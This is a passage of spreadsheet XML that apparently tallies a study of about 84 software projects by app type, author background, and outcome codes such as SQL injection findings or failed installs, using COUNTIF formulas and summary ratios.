        <v>459</v>
      </c>
      <c r="L118" s="59">
        <v>3</v>
      </c>
      <c r="M118" s="59"/>
      <c r="N118" s="59"/>
      <c r="O118" s="59"/>
      <c r="P118" s="59">
        <v>3</v>
      </c>
    </row>
    <row r="119" spans="3:16" ht="18" customHeight="1">
      <c r="C119" s="130"/>
      <c r="D119" s="99" t="s">
        <v>637</v>
      </c>
      <c r="E119" s="86">
        <v>5</v>
      </c>
      <c r="F119" s="86">
        <v>3</v>
      </c>
      <c r="G119" s="86">
        <v>52</v>
      </c>
      <c r="H119" s="86">
        <v>62</v>
      </c>
      <c r="K119" t="s">
        <v>469</v>
      </c>
      <c r="L119" s="59">
        <v>2</v>
      </c>
      <c r="M119" s="59"/>
      <c r="N119" s="59"/>
      <c r="O119" s="59"/>
      <c r="P119" s="59">
        <v>2</v>
      </c>
    </row>
    <row r="120" spans="3:16">
      <c r="C120" s="132" t="s">
        <v>638</v>
      </c>
      <c r="D120" s="11" t="s">
        <v>414</v>
      </c>
      <c r="E120">
        <v>1</v>
      </c>
      <c r="F120">
        <v>2</v>
      </c>
      <c r="G120">
        <v>18</v>
      </c>
      <c r="H120" s="100">
        <v>21</v>
      </c>
      <c r="K120" t="s">
        <v>425</v>
      </c>
      <c r="L120" s="59"/>
      <c r="M120" s="59"/>
      <c r="N120" s="59"/>
      <c r="O120" s="59">
        <v>2</v>
      </c>
      <c r="P120" s="59">
        <v>2</v>
      </c>
    </row>
    <row r="121" spans="3:16">
      <c r="C121" s="132"/>
      <c r="D121" s="11" t="s">
        <v>246</v>
      </c>
      <c r="E121">
        <v>5</v>
      </c>
      <c r="F121">
        <v>2</v>
      </c>
      <c r="G121">
        <v>14</v>
      </c>
      <c r="H121" s="100">
        <v>21</v>
      </c>
      <c r="K121" t="s">
        <v>627</v>
      </c>
      <c r="L121" s="59"/>
      <c r="M121" s="59"/>
      <c r="N121" s="59">
        <v>1</v>
      </c>
      <c r="O121" s="59"/>
      <c r="P121" s="59">
        <v>1</v>
      </c>
    </row>
    <row r="122" spans="3:16">
      <c r="C122" s="132"/>
      <c r="D122" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E122">
        <v>0</v>
      </c>
      <c r="F122">
        <v>0</v>
      </c>
      <c r="G122">
        <v>3</v>
      </c>
      <c r="H122" s="100">
        <v>3</v>
      </c>
      <c r="K122" t="s">
        <v>117</v>
      </c>
      <c r="L122" s="59">
        <v>52</v>
      </c>
      <c r="M122" s="59">
        <v>5</v>
      </c>
      <c r="N122" s="59">
        <v>3</v>
      </c>
      <c r="O122" s="59">
        <v>2</v>
      </c>
      <c r="P122" s="59">
        <v>62</v>
      </c>
    </row>
    <row r="123" spans="3:16">
      <c r="C123" s="132"/>
      <c r="D123" s="11" t="s">
        <v>639</v>
      </c>
      <c r="E123">
        <v>1</v>
      </c>
      <c r="F123">
        <v>1</v>
      </c>
      <c r="G123">
        <v>2</v>
      </c>
      <c r="H123" s="100">
        <v>4</v>
      </c>
    </row>
    <row r="124" spans="3:16">
      <c r="C124" s="132"/>
      <c r="D124" s="11" t="s">
        <v>36</v>
      </c>
      <c r="E124">
        <v>0</v>
      </c>
      <c r="F124">
        <v>0</v>
      </c>
      <c r="G124">
        <v>1</v>
      </c>
      <c r="H124" s="100">
        <v>1</v>
      </c>
    </row>
    <row r="125" spans="3:16">
      <c r="C125" s="132"/>
      <c r="D125" s="86" t="s">
        <v>640</v>
      </c>
      <c r="E125" s="86">
        <v>7</v>
      </c>
      <c r="F125" s="86">
        <v>5</v>
      </c>
      <c r="G125" s="86">
        <v>38</v>
      </c>
      <c r="H125" s="86">
        <v>50</v>
      </c>
    </row>
    <row r="126" spans="3:16" ht="23.25">
      <c r="C126" s="103" t="s">
        <v>641</v>
      </c>
      <c r="D126" s="134" t="s">
        <v>642</v>
      </c>
      <c r="E126" s="134">
        <v>4</v>
      </c>
      <c r="F126" s="134">
        <v>2</v>
      </c>
      <c r="G126" s="134">
        <v>34</v>
      </c>
      <c r="H126" s="134">
        <v>40</v>
      </c>
    </row>
    <row r="127" spans="3:16" ht="21">
      <c r="C127" s="105" t="s">
        <v>643</v>
      </c>
      <c r="H127">
        <v>152</v>
      </c>
    </row>
    <row r="136" spans="3:10">
      <c r="J136" s="8" t="s">
        <v>644</v>
      </c>
    </row>
    <row r="137" spans="3:10">
      <c r="J137" s="8">
        <f>COUNTIF(H1:H86, "Dead code")</f>
        <v>9</v>
      </c>
    </row>
    <row r="139" spans="3:10">
      <c r="J139" s="8" t="s">
        <v>645</v>
      </c>
    </row>
    <row r="140" spans="3:10">
      <c r="J140" s="8">
        <f>COUNTIF(H1:H86, "Unprotected library")</f>
        <v>1</v>
      </c>
    </row>
    <row r="142" spans="3:10">
      <c r="C142" s="14" t="s">
        <v>646</v>
      </c>
      <c r="D142" s="14"/>
      <c r="F142" s="14" t="s">
        <v>647</v>
      </c>
    </row>
    <row r="143" spans="3:10">
      <c r="C143" t="s">
        <v>414</v>
      </c>
      <c r="D143">
        <f>COUNTIF(C1:C86,"Web app")</f>
        <v>37</v>
      </c>
      <c r="F143" t="s">
        <v>416</v>
      </c>
      <c r="G143">
        <f>COUNTIF($G$1:$G$86,"SQL-IA")</f>
        <v>4</v>
      </c>
    </row>
    <row r="144" spans="3:10">
      <c r="C144" t="s">
        <v>648</v>
      </c>
      <c r="D144">
        <f>COUNTIF(C1:C86,"Standalone app")</f>
        <v>37</v>
      </c>
      <c r="F144" t="s">
        <v>544</v>
      </c>
      <c r="G144">
        <f>COUNTIF($G$1:$G$86,"SQL-IDIA")</f>
        <v>1</v>
      </c>
    </row>
    <row r="145" spans="3:7" ht="42" customHeight="1">
      <c r="C145" s="10" t="s">
        <v>469</v>
      </c>
      <c r="D145">
        <f>COUNTIF(C1:C86,"Web app with server and client components")</f>
        <v>3</v>
      </c>
      <c r="F145" t="s">
        <v>14</v>
      </c>
      <c r="G145">
        <f>COUNTIF($G$1:$G$86,"No")</f>
        <v>17</v>
      </c>
    </row>
    <row r="146" spans="3:7">
      <c r="C146" s="10" t="s">
        <v>459</v>
      </c>
      <c r="D146">
        <f>COUNTIF(C1:C86,"Library/Framework")</f>
        <v>4</v>
      </c>
      <c r="F146" t="s">
        <v>421</v>
      </c>
      <c r="G146">
        <f>COUNTIF(G1:G86,"Did not install")</f>
        <v>62</v>
      </c>
    </row>
    <row r="147" spans="3:7">
      <c r="C147" s="11" t="s">
        <v>627</v>
      </c>
      <c r="D147" s="11">
        <f>COUNTIF(C1:C86,"Code Snippet")</f>
        <v>1</v>
      </c>
    </row>
    <row r="148" spans="3:7">
      <c r="C148" s="11" t="s">
        <v>425</v>
      </c>
      <c r="D148">
        <f>COUNTIF(C1:C86,"Unknown")</f>
        <v>2</v>
      </c>
    </row>
    <row r="150" spans="3:7">
      <c r="D150"/>
      <c r="G150">
        <f>SUM(G143:G146)</f>
        <v>84</v>
      </c>
    </row>
    <row r="151" spans="3:7">
      <c r="D151"/>
    </row>
    <row r="152" spans="3:7">
      <c r="D152"/>
    </row>
    <row r="153" spans="3:7">
      <c r="D153"/>
    </row>
    <row r="154" spans="3:7">
      <c r="D154"/>
    </row>
    <row r="155" spans="3:7">
      <c r="C155" s="14" t="s">
        <v>649</v>
      </c>
      <c r="D155"/>
    </row>
    <row r="156" spans="3:7">
      <c r="C156" s="11" t="s">
        <v>405</v>
      </c>
      <c r="D156">
        <f>COUNTIF(D1:D86,"Professional")</f>
        <v>69</v>
      </c>
    </row>
    <row r="157" spans="3:7">
      <c r="C157" s="11" t="s">
        <v>504</v>
      </c>
      <c r="D157">
        <f>COUNTIF(D1:D86,"Tutorial")</f>
        <v>4</v>
      </c>
    </row>
    <row r="158" spans="3:7">
      <c r="C158" s="11" t="s">
        <v>30</v>
      </c>
      <c r="D158">
        <f>COUNTIF(D1:D86,"Student")</f>
        <v>9</v>
      </c>
    </row>
    <row r="159" spans="3:7">
      <c r="C159" s="11" t="s">
        <v>425</v>
      </c>
      <c r="D159">
        <f>COUNTIF(D1:D86,"Unknown")</f>
        <v>2</v>
      </c>
    </row>
    <row r="163" spans="3:4">
      <c r="C163" s="11" t="s">
        <v>650</v>
      </c>
      <c r="D163">
        <f>SUM(D143:D148)</f>
        <v>84</v>
      </c>
    </row>
    <row r="164" spans="3:4">
      <c r="C164" s="11" t="s">
        <v>651</v>
      </c>
      <c r="D164" s="16">
        <f>SUM(G143:G144)/D163</f>
        <v>5.9523809523809521E-2</v>
      </c>
    </row>
    <row r="165" spans="3:4">
      <c r="C165" s="11" t="s">
        <v>652</v>
      </c>
      <c r="D165" s="16">
        <f>D143/D163</f>
        <v>0.44047619047619047</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="C120:C125"/>
    <mergeCell ref="C111:C112"/>
    <mergeCell ref="D111:D112"/>
    <mergeCell ref="E111:G111"/>
    <mergeCell ref="D93:D96"/>
    <mergeCell ref="F91:I91"/>
    <mergeCell ref="D97:D100"/>
    <mergeCell ref="C93:C105"/>
    <mergeCell ref="C113:C119"/>
    <mergeCell ref="H111:H112"/>
  </mergeCells>
  <conditionalFormatting sqref="H6:H7 H13 G105:G110 G112:G1048576 G8:G12 G1:G5 G14:G90">
    <cfRule type="beginsWith" dxfId="5" priority="9" operator="beginsWith" text="No">
      <formula>LEFT(G1,LEN("No"))="No"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H6:H7 H13 G105:G110 G112:G1048576 G8:G12 G1:G5 G14:G90">
    <cfRule type="containsText" dxfId="4" priority="8" operator="containsText" text="Did not install">
      <formula>NOT(ISERROR(SEARCH("Did not install",G1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H6:H7 H13 G105:G110 G112:G1048576 G8:G12 G1:G5 G14:G90">
    <cfRule type="containsText" dxfId="3" priority="7" operator="containsText" text="SQL">
      <formula>NOT(ISERROR(SEARCH("SQL",G1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="beginsWith" dxfId="2" priority="3" operator="beginsWith" text="No">
      <formula>LEFT(H14,LEN("No"))="No"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="Did not install">
      <formula>NOT(ISERROR(SEARCH("Did not install",H14)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="containsText" dxfId="0" priority="1" operator="containsText" text="SQL">
      <formula>NOT(ISERROR(SEARCH("SQL",H14)))</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="B2" r:id="rId2" xr:uid="{B671F4A8-2BEB-4CF6-AED7-40950FE4B8B7}"/>
    <hyperlink ref="B3" r:id="rId3" xr:uid="{B01D1641-00E6-4345-9FAA-1C64918793E1}"/>
    <hyperlink ref="B4" r:id="rId4" xr:uid="{A15CB37E-ABD4-40C7-9B31-9ECAE8BE3418}"/>
    <hyperlink ref="B5" r:id="rId5" xr:uid="{39DC83C1-9D61-4A49-8589-63B5A5A34DE9}"/>
    <hyperlink ref="B6" r:id="rId6" xr:uid="{BF4548CE-7538-4618-9DF4-020829B2BA93}"/>
    <hyperlink ref="B7" r:id="rId7" xr:uid="{16C52097-931F-4C7D-BEAB-F13E9CE66E2A}"/>
    <hyperlink ref="B8" r:id="rId8" xr:uid="{D7BA3061-6974-4972-BAB3-F4B6397BF1B7}"/>
    <hyperlink ref="B9" r:id="rId9" xr:uid="{EDA209C9-6BBA-44EF-B003-3EF6A8D74F18}"/>
    <hyperlink ref="B10" r:id="rId10" xr:uid="{50451CFE-3F93-4529-92F0-0748B369598B}"/>
    <hyperlink ref="B11" r:id="rId11" xr:uid="{1EE0681C-C2DE-4389-BFC6-ACB26D8F9EB2}"/>
    <hyperlink ref="B12" r:id="rId12" xr:uid="{EA5F9CA9-A372-4579-B98D-19C5BD49714B}"/>
    <hyperlink ref="B13" r:id="rId13" xr:uid="{0B81D8C5-2D99-4657-8647-46AE0AADC668}"/>
    <hyperlink ref="B14" r:id="rId14" xr:uid="{4108B248-93C4-4C22-BC31-B1D631FEC584}"/>
    <hyperlink ref="B15" r:id="rId15" xr:uid="{07518137-41BE-4B13-8B17-02CB1653A965}"/>
    <hyperlink ref="B16" r:id="rId16" xr:uid="{9897388B-3EE8-48A1-B625-C96DA03A0088}"/>
    <hyperlink ref="B17" r:id="rId17" xr:uid="{8C578526-FAA5-4E7F-875B-352F72E1C976}"/>
    <hyperlink ref="B18" r:id="rId18" xr:uid="{A37A868E-DED4-44A0-AC96-4942D34ED6C7}"/>
    <hyperlink ref="B19" r:id="rId19" xr:uid="{C4A6C8BB-A345-4461-9042-C1F6639F2700}"/>
    <hyperlink ref="B20" r:id="rId20" xr:uid="{A3215052-A5CB-4747-A62B-8D64D2095D07}"/>
    <hyperlink ref="B21" r:id="rId21" xr:uid="{53B1E63E-1729-489C-90B0-A0559AE58363}"/>
    <hyperlink ref="B22" r:id="rId22" xr:uid="{5EDD7A62-1128-46F8-937C-2855681D88E4}"/>
    <hyperlink ref="B23" r:id="rId23" xr:uid="{57C4641E-2399-4AF6-9A1F-E64899D0F316}"/>
    <hyperlink ref="B24" r:id="rId24" xr:uid="{9C0753B3-F914-4184-9BB9-C701BEFE6375}"/>
    <hyperlink ref="B25" r:id="rId25" xr:uid="{6FAD1BE6-1FE5-4C3B-85D4-621C8227E1AB}"/>
    <hyperlink ref="B26" r:id="rId26" xr:uid="{2C992F1F-8282-4A5C-A8FC-368ED5319C3A}"/>
    <hyperlink ref="B27" r:id="rId27" xr:uid="{DBD30F1C-CE66-4B78-BC93-2E278C1E3AB6}"/>
    <hyperlink ref="B28" r:id="rId28" xr:uid="{1A13BA00-DE3C-4733-800B-0B0E4C3F657F}"/>
    <hyperlink ref="B29" r:id="rId29" xr:uid="{18BDEE72-36F3-4691-BE11-0813A26F2018}"/>
    <hyperlink ref="B30" r:id="rId30" xr:uid="{A0554B3B-85B7-4DD1-9FD4-16144A01FE05}"/>
    <hyperlink ref="B31" r:id="rId31" xr:uid="{D17FC28D-CC30-482F-A792-8D5D2F6824C4}"/>
    <hyperlink ref="B32" r:id="rId32" xr:uid="{DE8ADFD5-AE88-4675-9DA6-8FB72AA5EED2}"/>
    <hyperlink ref="B33" r:id="rId33" xr:uid="{9DDCA297-98F3-471A-BE1F-EB3174C96E11}"/>
    <hyperlink ref="B34" r:id="rId34" xr:uid="{C2CECB28-19E6-4CBD-AD0E-0A553979AC30}"/>
    <hyperlink ref="B35" r:id="rId35" xr:uid="{7607F83F-DB16-4D8B-8BF5-0C2DB7D22B9C}"/>
    <hyperlink ref="B36" r:id="rId36" xr:uid="{E165BEBD-6C89-4996-A2B8-E31DE9A5DBCE}"/>
    <hyperlink ref="B37" r:id="rId37" xr:uid="{514AFB10-C148-4BDC-8556-41FB71A7013A}"/>
    <hyperlink ref="B38" r:id="rId38" xr:uid="{C529402D-D910-4FDB-9F48-8843546B3E1C}"/>
    <hyperlink ref="B39" r:id="rId39" xr:uid="{5D235019-2F6E-4BA3-8F1D-CDA7B429DF02}"/>
    <hyperlink ref="B40" r:id="rId40" xr:uid="{89D882E3-6DBE-4FF4-85C4-43A8A7631511}"/>
    <hyperlink ref="B41" r:id="rId41" xr:uid="{866D03C6-3149-42FA-A58A-A01979C4D187}"/>
    <hyperlink ref="B42" r:id="rId42" xr:uid="{235ADFA2-3A4E-4ED5-B42A-F8C17EFCACB5}"/>
    <hyperlink ref="B43" r:id="rId43" xr:uid="{BAB96433-53A5-4432-8A0C-A558B8840C84}"/>
    <hyperlink ref="B44" r:id="rId44" xr:uid="{10D33BA2-EABB-4D4D-8A1D-91EA9E184645}"/>
    <hyperlink ref="B45" r:id="rId45" xr:uid="{8680FBA9-FA3D-4890-B105-595890D57EEC}"/>
    <hyperlink ref="B46" r:id="rId46" xr:uid="{3F54FF0D-49D5-44ED-A511-DBA70A178E28}"/>
    <hyperlink ref="B47" r:id="rId47" xr:uid="{27EE6817-1F31-4195-8B09-DFEA69F61809}"/>
    <hyperlink ref="B48" r:id="rId48" xr:uid="{23A6D371-59B0-4F44-A3F5-D693A447B1A3}"/>
    <hyperlink ref="B49" r:id="rId49" xr:uid="{49D0FF86-6DCB-4F96-A8D1-BCFFE2825F3F}"/>
    <hyperlink ref="B50" r:id="rId50" xr:uid="{BBA76115-6CB6-4E58-B9F6-92C5082B13A9}"/>
    <hyperlink ref="B51" r:id="rId51" xr:uid="{79BD4552-37A1-4CF7-A76C-81AD27385C5A}"/>
    <hyperlink ref="B52" r:id="rId52" xr:uid="{04947B54-89C3-40E8-A092-CC0CCCBB1161}"/>
    <hyperlink ref="B53" r:id="rId53" xr:uid="{B59F3ABD-6CA3-4D99-9770-4CC07430BEF5}"/>
    <hyperlink ref="B54" r:id="rId54" xr:uid="{A9DF329C-045D-413A-83FB-5762E6129282}"/>
    <hyperlink ref="B55" r:id="rId55" xr:uid="{D065DFF7-2575-43C0-A768-E8BE5DB1DFAA}"/>
    <hyperlink ref="B56" r:id="rId56" xr:uid="{3D24C56F-1B87-4EB0-8E6F-3DA48641B4C9}"/>
    <hyperlink ref="B57" r:id="rId57" xr:uid="{C8BAA559-9369-4D0F-BEC1-FA9EF1ED2AAC}"/>
    <hyperlink ref="B58" r:id="rId58" xr:uid="{84AEA20A-BBBD-4F8D-8125-B6A7E9C1EF00}"/>
    <hyperlink ref="B59" r:id="rId59" xr:uid="{AD27243A-6741-4FA2-8063-B78B34B1094C}"/>
    <hyperlink ref="B60" r:id="rId60" xr:uid="{A9A24302-D72A-4E69-A169-3C08A4542CF6}"/>
    <hyperlink ref="B61" r:id="rId61" xr:uid="{D3442CF8-529F-48C8-A78B-31327942EBE1}"/>
    <hyperlink ref="B62" r:id="rId62" xr:uid="{4D489CB6-9185-42CF-B030-DD95673DE4C1}"/>
    <hyperlink ref="B63" r:id="rId63" xr:uid="{BA93C6D2-578B-4D03-A8AA-6818F77C0616}"/>
    <hyperlink ref="B64" r:id="rId64" xr:uid="{8F751508-28D1-4AE3-86F2-46CA878DEBC8}"/>
    <hyperlink ref="B65" r:id="rId65" xr:uid="{A1CC9DBF-9085-40DE-AD47-87CD13C29656}"/>
    <hyperlink ref="B66" r:id="rId66" xr:uid="{40C1AC5E-48E2-41BE-A81B-2D37CEBF56D8}"/>
    <hyperlink ref="B67" r:id="rId67" xr:uid="{25787F23-7888-4629-8D58-8BE34D85E6A3}"/>
    <hyperlink ref="B68" r:id="rId68" xr:uid="{12F4B836-6AA9-4F18-813A-5FF3E1313139}"/>
    <hyperlink ref="B69" r:id="rId69" xr:uid="{C31A1BE9-6979-4AF8-AB3F-DA14A91514CC}"/>
    <hyperlink ref="B70" r:id="rId70" xr:uid="{EBDE0BC2-BE30-4712-863E-C71F7497BBB9}"/>
    <hyperlink ref="B71" r:id="rId71" xr:uid="{D7C1E770-0989-4F98-BD1A-FC6FD272567B}"/>
    <hyperlink ref="B72" r:id="rId72" xr:uid="{EB5A4376-E1A4-4164-915A-D8AFE47CE691}"/>
    <hyperlink ref="B73" r:id="rId73" xr:uid="{60A3EE47-425C-4750-94A5-5FDFBC4C79D0}"/>
    <hyperlink ref="B74" r:id="rId74" xr:uid="{A40293F8-6365-44E9-ACCC-8BA8B28F45B5}"/>
    <hyperlink ref="B76" r:id="rId75" xr:uid="{B2E43699-EB9C-4CCF-9610-DAD471F190CD}"/>
    <hyperlink ref="B77" r:id="rId76" xr:uid="{EE41F72E-C6BE-488A-B191-4FBD98CD6543}"/>
    <hyperlink ref="B78" r:id="rId77" xr:uid="{C62EF4AB-7E70-4C0D-B3BE-B1CED18A267A}"/>
    <hyperlink ref="B79" r:id="rId78" xr:uid="{52F10234-044E-4070-9A72-900BF9A8B05A}"/>
    <hyperlink ref="B80" r:id="rId79" xr:uid="{7C51B474-56B8-4411-A7EB-2109BC361B73}"/>
    <hyperlink ref="B81" r:id="rId80" xr:uid="{2012CB22-CF5E-4331-ABD9-DD8259A3E912}"/>
    <hyperlink ref="B82" r:id="rId81" xr:uid="{99D5F2BE-A8EA-4D45-9152-E02B889E4FAC}"/>
    <hyperlink ref="B83" r:id="rId82" xr:uid="{671DCCC9-065A-4E67-9F9E-B17BE5F4F226}"/>
    <hyperlink ref="B84" r:id="rId83" xr:uid="{17B65F60-2FF8-488A-8075-F5539E0611DD}"/>
    <hyperlink ref="B85" r:id="rId84" xr:uid="{F447E871-62D1-4F7B-8C1E-B6B5A7777591}"/>
    <hyperlink ref="B86" r:id="rId85" xr:uid="{82BD9C53-5A1B-444B-A64C-12B568D02D08}"/>
    <hyperlink ref="B75" r:id="rId86" xr:uid="{954E2933-6D9A-4690-AFFD-8939BCBFFA0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Kevin Dennis</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-03T19:40:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-25T01:53:32Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>